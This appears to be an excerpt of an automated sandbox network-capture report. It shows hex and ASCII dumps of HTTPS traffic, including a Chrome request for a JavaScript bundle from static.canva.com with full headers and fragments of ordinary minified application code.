                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: c2 b0 4a d6 9a 16 e0 30 17 6e 92 40 02 74 87 9e 83 98 51 e8 41 1d 09 62 29 ae 98 5c da 32 0e 62 4b d0 ed 54 37 f1 86 a7 74 ae e3 76 65 2e ca 61 be b8 4b 1d 04 be 6b 0c 2f 0d 59 43 ab 62 64 de 5b 6d 54 5d b4 a5 c0 c3 0e 5d 96 2b 08 ca 8f 26 e2 da 78 67 ac da 20 de 18 26 6b 76 64 c5 ed 9f 9d 99 66 16 48 0d 56 a7 c4 85 18 ba 50 f6 fe c0 d0 78 8b 7b bf 66 0b 6a a7 e8 48 ec b2 fb ee a4 f1 0b cd a4 30 31 2f 42 b0 6c 1d d4 a2 bf 8d 57 f5 e7 76 3b e3 3d 56 68 f3 d0 45 ad b0 ec cc 37 05 bb dc f4 73 e3 00 98 ac 9a 12 41 2f 82 71 ed c3 0c 66 ad d4 86 62 0a d1 a2 dc 39 55 71 80 d2 1a ae a4 da e2 3e d9 e9 80 59 11 1a 94 35 71 a6 9b ee e9 c9 08 5c 44 cc e3 88 00 c8 42 bb 50 3e b0 d8 a0 0f 1c e4 61 53 0a 9a 90 d5 6d 41 e6 2a 40 e5 5c c1 0e b3 ff 86 3f 17 3e 5f c7 40 57
                                                                                                                                                                                                                                                    Data Ascii: J0n@tQAb)\2bKT7tve.aKk/YCbd[mT]]+&xg &kvdfHVPx{fjH01/BlWv;=VhE7sA/qfb9Uq>Y5q\DBP>aSmA*@\?>_@W
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 3f 66 4d f9 54 02 c1 b5 6b 24 53 23 68 0f 76 43 fb 50 42 95 d1 ea 22 75 1e 1a 71 0e 97 ed 4d 45 ef 5f fb 58 7f 8b a6 c9 49 2f c2 14 f2 f9 5d e0 8b f8 31 dd a0 08 fd 71 cc 95 6b 21 5c a0 b4 da ba 69 e8 b1 c0 ce 76 87 c3 d3 c2 29 82 a1 48 88 47 24 41 6e 79 74 d8 64 61 0a d2 30 cf 59 ec ea b1 6f b6 48 c5 c6 f5 34 4b 49 41 5d 50 e0 4e f7 f1 81 40 99 3d aa 68 4d 6f bd 87 e6 9b 9e f7 86 ef f9 09 d5 bc 28 f2 2f f4 8e ee e1 e3 35 df 11 bc eb 76 98 bd cb 58 80 f0 65 45 39 2a b3 2a a0 b3 3e 44 4d fd 42 b0 11 35 a2 fb f5 15 06 d8 c1 d8 e1 1c 7f 6c e8 61 24 af 9a a2 22 3c 8f 24 54 0d 79 de 8a ec 0c 14 db 43 1a a9 a2 b7 4a a8 45 03 5a ed 45 46 ba de 7b 17 74 d8 e7 54 f3 46 b7 ae f9 94 3f f3 3f e7 a6 46 3f a2 5f ea 4c 24 d3 aa 6b 58 8d 41 0f 23 02 41 51 8f 68 ef 22 f1
                                                                                                                                                                                                                                                    Data Ascii: ?fMTk$S#hvCPB"uqME_XI/]1qk!\iv)HG$Anytda0YoH4KIA]PN@=hMo(/5vXeE9**>DMB5la$"<$TyCJEZEF{tTF??F?_L$kXA#AQh"
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 04 a5 b6 c1 bb 84 31 b8 f1 17 a9 bf 21 92 6d 54 e8 a0 12 15 6a 35 6a f9 39 af 42 88 52 a9 36 1c 8c 28 27 9d 81 da a8 1b b4 f2 37 0c 2e 8c 8c 74 7a e9 35 13 ff 9f e0 41 11 c1 c6 44 60 a0 c3 10 1a 12 58 00 73 8d 28 22 1c 22 8e 18 6e 24 91 e0 14 e7 38 23 89 4b 5c 10 46 16 19 0e 91 47 0e 23 8a 28 e0 a7 a8 01 38 7b 3b 46 90 fd 0d c1 39 d4 08 22 65 4d 60 a6 a2 49 bc 54 76 0a 91 a3 cd 42 39 d5 0a 9c d3 9d 46 a6 a1 06 b4 9c e9 0c 32 8d 35 a2 e5 6c e7 d0 73 b9 cb c4 b9 d2 15 a2 dc ee 36 56 9e f5 8c 63 3a eb c4 29 02 13 c0 86 f1 ea 3e ac 18 86 70 61 3a f4 a7 59 0e 81 44 20 97 68 8a 33 71 7c 24 06 7a 9b 19 69 a4 38 d2 c7 6f d3 e2 1a 57 30 0b 88 20 80 b0 e3 e0 c3 ae 0e e1 e0 e2 1c 70 d3 e4 03 58 69 d9 c6 f2 e7 3c 18 8d 83 36 ca d3 9e c2 5f 0e 88 bc b0 6d a4 5b a5 49
                                                                                                                                                                                                                                                    Data Ascii: 1!mTj5j9BR6('7.tz5AD`Xs(""n$8#K\FG#(8{;F9"eM`ITvB9F25ls6Vc:)>pa:YD h3q|$zi8oW0 pXi<6_m[I
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 3b e1 c7 53 a6 4a 9d 66 97 dd f5 d8 2b 9f fc 08 46 6c 24 8c 2c 9a 18 40 40 aa 06 01 a4 b1 81 0e 74 9d 7e 84 8f 54 d0 81 8a 36 66 30 90 44 80 80 21 f1 0d 2c a9 91 d9 20 a0 32 b4 94 7c 87 4f 69 29 64 d7 71 5a 43 ab 68 05 65 d0 52 bb 58 79 ce c2 32 d9 9c 82 8e 53 aa a0 b2 bc 04 89 a9 6d a3 68 3b 81 9e 3b 4f 0f 68 4c 20 ad 16 2c 05 7e 08 04 47 b0 e9 1d b7 1b c6 b7 f6 01 b7 e8 15 08 3a 5f fc a7 17 28 c2 49 77 a5 ca 98 48 73 7a 05 7d 09 ef 0a 35 15 18 9b 23 ac 48 c9 bf 63 d7 41 4d 08 5d 71 15 5d 82 5b 3f 80 ef 48 1a 65 bc c7 3a 4f d1 37 eb 23 80 aa 57 f3 01 82 58 bf dd 18 f7 1e cf 7d 7a 9c a3 ba 2e 59 a9 8b 5e ab f9 5e 83 19 5e ad e1 5e fd f3 37 57 c4 26 71 00 68 68 e0 35 9b 00 d5 a7 2e c3 2a aa 50 9b 31 ab b4 2f 40 b5 fd 99 f8 e1 86 1b 08 e7 07 5e f9 6b 32 c0
                                                                                                                                                                                                                                                    Data Ascii: ;SJf+Fl$,@@t~T6f0D!, 2|Oi)dqZCheRXy2Smh;;OhL ,~G:_(IwHsz}5#HcAM]q][?He:O7#WX}z.Y^^^^7W&qhh5.*P1/@^k2
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: a5 77 80 a7 fd bc 1d 66 70 88 d9 7f 02 1d e3 a7 5c 90 2a 26 a5 7c 1d 15 a2 06 a5 d6 49 e1 4e 89 70 5a 77 f5 2c 1a f4 70 46 94 66 bd b4 8a d6 22 c6 39 09 ae ea eb 82 fe ae 18 e8 86 bf dd 35 c4 7d 49 ee 19 e6 81 91 1e 19 a1 c3 70 0f d9 bc 30 ce 73 63 3d 33 c3 67 53 7d 90 e2 b5 e9 3e 99 e2 bd 69 3e 9a e5 9b f9 7e 5b 60 71 10 2c 8d 32 2c 09 86 65 51 01 9e 8d 46 79 6c bc ce d2 6b d0 5b ad 3e 76 d3 57 4f c5 4a 94 aa 50 a9 5c 91 4e ba ea ac 8c 39 fe 37 d3 57 b3 7d b7 90 1d 9d af b1 53 9d ab a1 fa ee d5 5e e9 1c c0 34 cc c0 2c cc c3 7c cc c5 74 cc c4 6c 64 47 af 7b 39 80 6e cd e7 12 e8 a8 37 3b 71 c0 b1 1d c8 3a 14 45 51 04 28 86 62 e4 00 8a a3 38 39 8b 12 28 41 ca 51 12 25 c9 53 94 42 29 0a 04 4a a3 34 b9 82 32 28 43 ce a1 2c ca 91 e3 28 8f f2 a4 0c 15 50 81 bc
                                                                                                                                                                                                                                                    Data Ascii: wfp\*&|INpZw,pFf"95}Ip0sc=3gS}>i>~[`q,2,eQFylk[>vWOJP\N97W}S^4,|tldG{9n7;q:EQ(b89(AQ%SB)J42(C,(P
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: e4 6f cc 26 49 24 09 77 92 21 64 08 66 91 a1 64 28 ee 21 7f 92 6e cc 25 c3 e3 7e 32 22 16 90 91 71 1f 19 15 f3 c9 e8 b8 97 8c 89 79 64 6c 3c 4a c6 c5 32 62 8b 47 c8 f8 58 4a 92 e3 61 32 21 96 90 94 78 91 4c 8c 4d 64 52 3c 47 26 c7 7a 32 25 9e 24 53 63 15 99 b6 bd 30 89 8d 64 46 3c 4b 52 63 1d 49 8b e7 c9 cc d8 40 66 f1 c9 ec d8 46 e6 c4 db 64 6e ec 21 f3 e2 1d 92 5e ef 93 f9 a0 67 41 7d 48 16 42 3c 8b ea 03 b2 18 3c 39 da 9e 63 f5 11 a9 82 7c 7e c5 11 20 0c be 2f de 05 6a 43 3c 06 d4 c6 b8 18 d4 a6 78 12 a8 cd 71 25 a8 43 ea 67 a0 fe cc ae f3 17 bb cf df ec 36 67 da 63 ce b2 e3 9c 6d cf 39 c7 be 73 ae bd e6 bc b5 cb db fc 92 ad 55 4a 9a 43 3c 41 42 22 89 c8 64 1e 85 c2 a5 d1 c4 74 ba 1a 83 a1 81 61 32 1d 3d f9 f9 2d 24 db 72 04 da d7 92 95 40 fb 65 b2 0a
                                                                                                                                                                                                                                                    Data Ascii: o&I$w!dfd(!n%~2"qydl<J2bGXJa2!xLMdR<G&z2%$Sc0dF<KRcI@fFdn!^gA}HB<<9c|~ /jC<xq%Cg6gcm9sUJC<AB"dta2=-$r@e
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 4d a6 c5 b4 99 0e d3 65 7a 4c 9f 19 b0 a8 90 9f 00 1b 49 8b a6 83 23 eb 05 23 39 8a d1 b2 6a 64 34 26 c8 8d cd 50 d1 c2 bd 6f fa 43 ce 01 cc 10 d3 9c a4 15 69 ee 95 4f 1a ce 71 b4 60 a7 b9 62 8d 6c e3 6e 36 ce fb 45 d4 b9 89 3e 36 07 cd a5 6f 2a 9e ce af 80 17 56 af 58 e3 dc 30 ce b6 be 2c 49 d8 e1 39 36 27 82 7f 00 98 6e c9 4a 59 a9 ef e6 0d b2 01 36 30 b3 3d 45 9c 8d 62 7b b7 68 6e 6c ec db b4 a3 8b 91 14 83 ad 43 f7 28 9c 04 8e 66 c8 10 cd 9c e9 7d 93 3f db 4d a9 3f 41 cf 5c ed 1d 9a 42 dd 29 99 bb da d3 83 0f 20 82 ef da d4 29 f8 4a 69 52 c5 90 e3 b4 3a fb 3f f3 24 01 1b 79 07 e7 71 91 40 23 2b 46 e9 16 9a 99 01 bf 58 59 86 56 e7 fa 4b b0 cb b9 db fa f3 e5 86 85 7a 5b d0 88 dc 9c 9d 92 69 34 35 59 b2 46 ac 79 ac 37 4d 23 30 76 42 91 a9 33 c1 43 67 72
                                                                                                                                                                                                                                                    Data Ascii: MezLI##9jd4&PoCiOq`bln6E>6o*VX0,I96'nJY60=Eb{hnlC(f}?M?A\B) )JiR:?$yq@#+FXYVKz[i45YFy7M#0vB3Cgr


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    35192.168.2.449778104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC615OUTGET /web/32526717065b2b04.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 22394
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a1c7a0c0f67-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71059
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "495c0ac6bd7bac84d05d17cf85abe15d"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:16 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:33 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: sTN+f3gVl1YM4SspMURs6x9aJX2yiTaIQyYBjnlvpBaSHu2nz8EA9Z6zwaj2MTA/SfIBnSaEm7s=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYPJ858SAFFKEWQ
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: AfvhL9R7ManxqkdDCdw7qNuRX6MhA4Xa
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 25 32 46 77 64 46 38 63 65 44 38 61 41 41 41 49 30 69 38 78 7a 79 35 54 38 35 33 46 4f 37 6d 25 32 46 56 66 4b 77 46 31 67 64 76 64 44 68 6f 39 43 43 79 67 45 75 6f 4f 59 5a 64 25 32 42 67 77 71 58 63 43 6f 53 34 33 44 38 30 66 42 32 61 25 32 46 74 63 6f 45 50 71 48 43 31 55 4f 4f 50 38 46 67 4c 51 36 73 47 6e 46 49 44 54 55 6f 62 4a 6a 4f 66 4a 4c 4a 30 57 46 4a 5a 56 61 73 38 36 6b 73 4c 25 32 42 33 31 41 68 45 66 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FwdF8ceD8aAAAI0i8xzy5T853FO7m%2FVfKwF1gdvdDho9CCygEuoOYZd%2BgwqXcCoS43D80fB2a%2FtcoEPqHC1UOOP8FgLQ6sGnFIDTUobJjOfJLJ0WFJZVas86ksL%2B31AhEfQ%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 33 34 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 35 37 37 30 33 33 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 66
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3349],{/***/ 577033:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._f
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 66 3f 76 6f 69 64 20 30 3a 66 2e 65 72 72 6f 72 29 7c 7c 61 2e 75 74 2e 65 72 72 6f 72 7c 7c 45 72 72 6f 72 28 22 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 22 29 29 29 7d 29 3b 63 6f 6e 73 74 20 65 3d 6e 65 77 20 74 38 61 3b 61 2e 75 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 62 6f 72 74 22 2c 28 29 3d 3e 7b 69 66 28 61 2e 75 74 2e 65 72 72 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 7b 76 61 72 20 66 3d 65 2e 63 61 75 73 65 3d 61 2e 75 74 2e 65 72 72 6f 72 3b 66 3d 5b 60 24 7b 66 2e 6e 61 6d 65 7d 60 2c 60 24 7b 66 2e 6d 65 73 73 61 67 65 7d 60 5d 2e 66 69 6c 74 65 72 28 67 3d 3e 21 21 67 29 2e 6a 6f 69 6e 28 22 3a 20 22 29 3b 65 2e 6d 65 73 73 61 67 65 3d 60 24 7b 65 2e 6d 65 73 73 61 67 65 7d 20 28 24 7b 66 7d 29 60 7d
                                                                                                                                                                                                                                                    Data Ascii: f?void 0:f.error)||a.ut.error||Error("Unknown error")))});const e=new t8a;a.ut.addEventListener("abort",()=>{if(a.ut.error instanceof Error){var f=e.cause=a.ut.error;f=[`${f.name}`,`${f.message}`].filter(g=>!!g).join(": ");e.message=`${e.message} (${f})`}
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 61 29 7b 63 6f 6e 73 74 20 62 3d 74 79 70 65 6f 66 20 61 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 3d 62 3f 7b 73 74 72 69 6e 67 56 61 6c 75 65 3a 61 7d 3a 22 6e 75 6d 62 65 72 22 3d 3d 3d 62 3f 4e 75 6d 62 65 72 2e 69 73 49 6e 74 65 67 65 72 28 61 29 3f 7b 69 6e 74 56 61 6c 75 65 3a 61 7d 3a 7b 64 6f 75 62 6c 65 56 61 6c 75 65 3a 61 7d 3a 22 62 6f 6f 6c 65 61 6e 22 3d 3d 3d 62 3f 7b 62 6f 6f 6c 56 61 6c 75 65 3a 61 7d 3a 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 3f 7b 62 79 74 65 73 56 61 6c 75 65 3a 61 7d 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 7b 61 72 72 61 79 56 61 6c 75 65 3a 7b 76 61 6c 75 65 73 3a 61 2e 6d 61 70 28 54 59 29 7d 7d 3a 22 6f 62 6a 65 63 74 22 3d 3d 3d 62 26 26 6e 75 6c 6c 21 3d 61 3f
                                                                                                                                                                                                                                                    Data Ascii: a){const b=typeof a;return"string"===b?{stringValue:a}:"number"===b?Number.isInteger(a)?{intValue:a}:{doubleValue:a}:"boolean"===b?{boolValue:a}:a instanceof Uint8Array?{bytesValue:a}:Array.isArray(a)?{arrayValue:{values:a.map(TY)}}:"object"===b&&null!=a?
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 30 2c 65 76 65 6e 74 73 3a 5b 5d 2c 64 72 6f 70 70 65 64 45 76 65 6e 74 73 43 6f 75 6e 74 3a 30 2c 73 74 61 74 75 73 3a 72 2c 6c 69 6e 6b 73 3a 74 2c 64 72 6f 70 70 65 64 4c 69 6e 6b 73 43 6f 75 6e 74 3a 30 7d 7d 29 7d 5d 3b 63 2e 70 75 73 68 28 7b 72 65 73 6f 75 72 63 65 3a 61 2c 73 63 6f 70 65 53 70 61 6e 73 3a 66 7d 29 7d 72 65 74 75 72 6e 7b 72 65 73 6f 75 72 63 65 53 70 61 6e 73 3a 63 7d 7d 3b 0a 44 38 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 73 77 69 74 63 68 28 61 2e 74 79 70 65 29 7b 63 61 73 65 20 22 47 52 4f 55 50 45 44 5f 43 4f 4c 55 4d 4e 22 3a 63 61 73 65 20 22 47 52 4f 55 50 45 44 5f 52 4f 57 22 3a 72 65 74 75 72 6e 7b 73 70 61 63 69 6e 67 3a 61 2e 73 70 61 63 69 6e 67 2c 56 3a 61 2e 56 2c 53 61 3a 7b 2e 2e 2e 61 2e 53 61 2c 61 6c 69 67 6e
                                                                                                                                                                                                                                                    Data Ascii: 0,events:[],droppedEventsCount:0,status:r,links:t,droppedLinksCount:0}})}];c.push({resource:a,scopeSpans:f})}return{resourceSpans:c}};D8a=function(a){switch(a.type){case "GROUPED_COLUMN":case "GROUPED_ROW":return{spacing:a.spacing,V:a.V,Sa:{...a.Sa,align
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 72 6e 20 61 3d 3d 3d 62 3f 21 30 3a 6e 75 6c 6c 3d 3d 61 7c 7c 6e 75 6c 6c 3d 3d 62 7c 7c 61 2e 73 68 65 65 74 21 3d 3d 62 2e 73 68 65 65 74 3f 21 31 3a 61 2e 72 61 6e 67 65 3d 3d 3d 62 2e 72 61 6e 67 65 3f 21 30 3a 6e 75 6c 6c 3d 3d 61 2e 72 61 6e 67 65 7c 7c 6e 75 6c 6c 3d 3d 62 2e 72 61 6e 67 65 3f 21 31 3a 48 38 61 28 61 2e 72 61 6e 67 65 2e 73 74 61 72 74 2c 62 2e 72 61 6e 67 65 2e 73 74 61 72 74 29 26 26 48 38 61 28 61 2e 72 61 6e 67 65 2e 65 6e 64 2c 62 2e 72 61 6e 67 65 2e 65 6e 64 29 7d 3b 0a 48 38 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 21 30 3b 73 77 69 74 63 68 28 61 2e 74 79 70 65 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 30 3d 3d 3d 62 2e 74 79 70 65 26 26 61 2e 76 61 6c 75 65 2e 63
                                                                                                                                                                                                                                                    Data Ascii: rn a===b?!0:null==a||null==b||a.sheet!==b.sheet?!1:a.range===b.range?!0:null==a.range||null==b.range?!1:H8a(a.range.start,b.range.start)&&H8a(a.range.end,b.range.end)};H8a=function(a,b){if(a===b)return!0;switch(a.type){case 0:return 0===b.type&&a.value.c
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 75 6e 64 69 6e 67 42 6f 78 4c 65 66 74 3a 70 2c 61 63 74 75 61 6c 42 6f 75 6e 64 69 6e 67 42 6f 78 52 69 67 68 74 3a 71 2c 66 6f 6e 74 42 6f 75 6e 64 69 6e 67 42 6f 78 41 73 63 65 6e 74 3a 6c 2e 66 6f 6e 74 42 6f 75 6e 64 69 6e 67 42 6f 78 41 73 63 65 6e 74 2c 66 6f 6e 74 42 6f 75 6e 64 69 6e 67 42 6f 78 44 65 73 63 65 6e 74 3a 6c 2e 66 6f 6e 74 42 6f 75 6e 64 69 6e 67 42 6f 78 44 65 73 63 65 6e 74 2c 68 65 69 67 68 74 3a 6d 2b 6e 2c 77 69 64 74 68 3a 70 2b 71 2c 70 47 3a 6c 2e 77 69 64 74 68 7d 7d 29 3b 58 59 2e 73 65 74 28 68 2c 6b 29 3b 4e 38 61 28 6b 2c 28 29 3d 3e 7b 58 59 2e 64 65 6c 65 74 65 28 68 29 7d 29 3b 72 65 74 75 72 6e 7b 6f 4f 3a 6b 2e 67 65 74 28 29 2c 78 6c 3a 67 7d 7d 3b 4f 38 61 3d 66 75 6e 63 74 69 6f 6e 28 7b 6d 61 78 57 69 64 74 68
                                                                                                                                                                                                                                                    Data Ascii: undingBoxLeft:p,actualBoundingBoxRight:q,fontBoundingBoxAscent:l.fontBoundingBoxAscent,fontBoundingBoxDescent:l.fontBoundingBoxDescent,height:m+n,width:p+q,pG:l.width}});XY.set(h,k);N8a(k,()=>{XY.delete(h)});return{oO:k.get(),xl:g}};O8a=function({maxWidth
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 66 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 2c 22 63 6f 75 6c 64 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 6d 65 61 73 75 72 69 6e 67 20 63 61 6e 76 61 73 20 63 6f 6e 74 65 78 74 22 29 3b 66 2e 66 6f 6e 74 3d 60 24 7b 65 3f 5f 5f 63 2e 74 43 28 65 29 2b 22 20 22 3a 22 22 7d 24 7b 61 7d 70 78 20 27 24 7b 62 7d 27 60 3b 66 2e 74 65 78 74 41 6c 69 67 6e 3d 63 3b 66 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 64 3b 72 65 74 75 72 6e 20 66 7d 3b 0a 5f 5f 63 2e 77 44 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 4c 3d 5f 5f 63 2e 4e 59 28 31 31 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 73 77 69 74 63 68 28 28 76 6f 69 64 20 30 29 2e 74 79 70 65 29 7b 63 61 73 65 20 22 69 6e 76 61 6c 69 64 22 3a 72 65 74 75 72 6e 3b 63 61 73 65 20 22 63 61 6e 6f 6e 69 63 61 6c
                                                                                                                                                                                                                                                    Data Ascii: f.getContext("2d"),"could not initialize measuring canvas context");f.font=`${e?__c.tC(e)+" ":""}${a}px '${b}'`;f.textAlign=c;f.textBaseline=d;return f};__c.wD.prototype.kL=__c.NY(11,function(a){switch((void 0).type){case "invalid":return;case "canonical
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 7d 2c 52 59 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 73 75 70 65 72 28 22 49 6e 64 65 78 65 64 20 64 62 20 75 6e 61 76 61 69 6c 61 62 6c 65 22 29 3b 74 68 69 73 2e 63 61 75 73 65 3d 61 7d 7d 2c 51 59 2c 56 38 61 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 73 75 70 65 72 28 22 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 72 6f 77 73 20 65 78 63 65 65 64 65 64 20 66 6f 72 20 70 75 74 20 72 65 71 75 65 73 74 22 29 7d 7d 2c 57 38 61 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 73 75 70 65 72 28 22 46 61 69 6c 65 64 20 74 6f 20 64 65 73 65 72 69 61 6c 69 7a 65 20
                                                                                                                                                                                                                                                    Data Ascii: },RY=class extends Error{constructor(a){super("Indexed db unavailable");this.cause=a}},QY,V8a=class extends Error{constructor(){super("Maximum number of rows exceeded for put request")}},W8a=class extends Error{constructor(a){super("Failed to deserialize
